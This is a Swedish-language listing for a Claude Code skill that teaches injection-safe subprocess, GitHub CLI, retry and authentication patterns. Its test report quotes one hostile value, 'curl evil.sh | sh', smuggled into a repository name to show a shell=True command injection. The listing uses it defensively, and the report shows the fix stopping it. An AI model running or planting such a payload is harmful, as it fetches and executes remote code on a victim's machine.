API Integration Patterns

Underprocess-säkra API/CLI-mönster: ingen shell=True, vitlistade kommandon, retry-backoff, tokenvalidering.

av akaszubski · akaszubski/autonomous-dev

Testad · Fungerar ★ 8.4/10

API Integration Patterns — Underprocess-säkra API/CLI-mönster: ingen shell=True, vitlistade kommandon, retry-backoff, tokenvalidering.

Vad den gör

En referensmönster-färdighet som tillhandahåller säkra subprocess-, GitHub CLI-, retry-with-backoff-, autentiserings- och rate-limiting-kodmönster när Claude skriver extern API- eller CLI-integrationskod. Utlöses på nyckelord som subprocess/gh-cli/API-call/retry/auth och exkluderar uttryckligen interna funktioner eller endast konfigurationsändringar.

Testrapport

Verkligt CWE-78-test: baslinjekoden använde shell=True med ett f-string-reponamn, vilket tillät ett skapat reponamn att lägga till 'curl evil.sh | sh'; färdighetens argv-array + shell=False-version passerade samma skadliga sträng genom gh som ett inert argument. Konkret, inte kosmetiskt.

Testad: 2026-07-15 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Kommandon och exempelprompter

  • /api-integration-patternsUnderprocess-säkra API/CLI-mönster: ingen shell=True, vitlistade kommandon, retry-backoff, tokenvalidering.

Skills triggas av vanliga förfrågningar — inga kommandon att memorera. Efter installationen aktiverar prompter som dessa skillen (på engelska):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk